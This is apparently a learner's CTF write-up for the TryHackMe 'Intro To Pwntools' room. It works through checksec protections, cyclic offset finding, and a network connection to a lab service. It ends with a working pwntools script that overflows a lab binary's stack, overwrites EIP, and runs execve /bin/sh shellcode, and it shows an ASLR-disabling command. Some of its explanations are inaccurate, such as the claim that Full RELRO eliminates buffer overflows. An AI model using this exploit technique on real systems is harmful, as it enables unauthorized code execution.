Intro To Pwntools

CTFTryHackMe

https://tryhackme.com/room/introtopwntools

So I’m connected with ssh on the box:

Checksec

  1. Does Intro2pwn1 have FULL RELRO
    Full RELRO makes the entire GOT read-only which removes the ability to perform a “GOT overwrite” attack, where the GOT address of a function is overwritten with the location of another function or a ROP gadget an attacker wants to run.

So it’s more secure and eliminate the risk of buffer overflows.
https://ctf101.org/binary-exploitation/relocation-read-only/

1
checksec intro2pwn1

YES

  1. Does Intro2pwn1 have RWX segments
    RWX: Tells us, if the binary has segments
    We don’t see it in the output of checksec.

NO

  1. Does Intro2pwn2 have a stack canary

Stack canaries are tokens placed after a stack to detect a stack overflow.
This allows the program to detect a buffer overflow and shut down.

NO

  1. Does Intro2pwn2 not have PIE

PIE stands for Position Independent Executable.
This loads the program dependencies into random locations

Exemple without PIE:
He create a shared library

1
2
3
4
5
6
7
$ cc -fpic -shared -I. -nostdlib  
              -nodefaultlibs      
              -o libnotc.so       
              os/syscall.x86_64.s 
              os/syscall.c        
              not/strlen.c        
              not/puts.c

Then recompile it

1
2
3
4
$ cc -nostdlib -nodefaultlibs -I. 
              -o dynamic-example  
              os/start.x86_64.s   
              main.c -L. -lnotc

  1. Cause a buffer overflow on intro2pwn1 by inputting a long string such as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA. What was detected?

A stack buffer overflow can be caused deliberately as part of an attack known as stack smashing. it’s mean you can use it to gain acess on a machine

  1. Now cause a buffer overflow on intro2pwn2. What error do you get?

    so, if there is no stack smashing, can i use it to gain acess on the mavhine ?

cyclic

In this chapter we learn to do a bufferoverflow when the canary protection is missing.
you can see that with checksec.

We alsolern how to convert from hex to ascii, and acsii to hex.

With gdb you can locate the function print_flag() like this.

1
info function

Or like this:

1
print& print_flag

Then in a python script we have to change the value of eip:

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *

padding = cyclic(100)

padding = cyclic(cyclic_find('jaaa'))

#eip = p32(0xdeadbeef)
eip = p32(0x8048536)

payload = padding + eip

print(payload)

The output of payload should be printed in a file to be used later:

1
python pwn_cyclic.py > attack

in this file it’s looking like this:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaa6

Networking

1
2
3
4
5
6
7
8
Dear buzz,

I'm running a service on port 1337, which has an overflow vulnerability.
I've left you a version that will run on port 1336 so that you can develop
your exploit. 

Sincerely,
dizmas

So we have a copy of the service on the port 1336 of the service on the port 1337.
In this exemple we don’t have to change the payload or add nops, it’s just to show how to use the network.

1
2
3
4
5
6
7
from pwn import *
connect = remote('127.0.0.1', 1337)
print(connect.recvn(18))
payload = "A"*32
payload += p32(0xdeadbeef)
connect.send(payload)
print(connect.recvn(34))

Shellcraft

For this challenge we nee d to disable ASLR (address space layout randomization).
This randomise where in memory the executable is loaded, so if we found the location of a function, the next time we run it the function will be somewhere else.

1
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

ok, we don’t have the right to do it.
use the script instead.

1
sudo ./disable_aslr.sh

Let’s find the EIP, I’m creating a string with cyclic 100, then I open the program with gdb an past the string.
The EIP is at taaa

So I have to print 77*”A” and rest for the EIP.
Now we gonna use a python script:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

padding = cyclic(cyclic_find('taaa'))

eip = p32(0xffffd480+200)

nop_slide = "\x90"*1000

shellcode = "\xcc"

payload = padding + eip + nop_slide + shellcode

print(payload)

I put the output in the file payload:

Now let’s create the shellcode wih shellcraft.

1
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f a

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

proc = process('./intro2pwnFinal')

padding = cyclic(cyclic_find('taaa'))

eip = p32(0xffffd510+200)

nop_slide = "\x90"*1000

shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"

#shellcode = "\xcc"

payload = padding + eip + nop_slide + shellcode

proc.send(payload)

proc.interactive()

My EIP was wrong, didn’t say the value 0xffffd510 in gdb.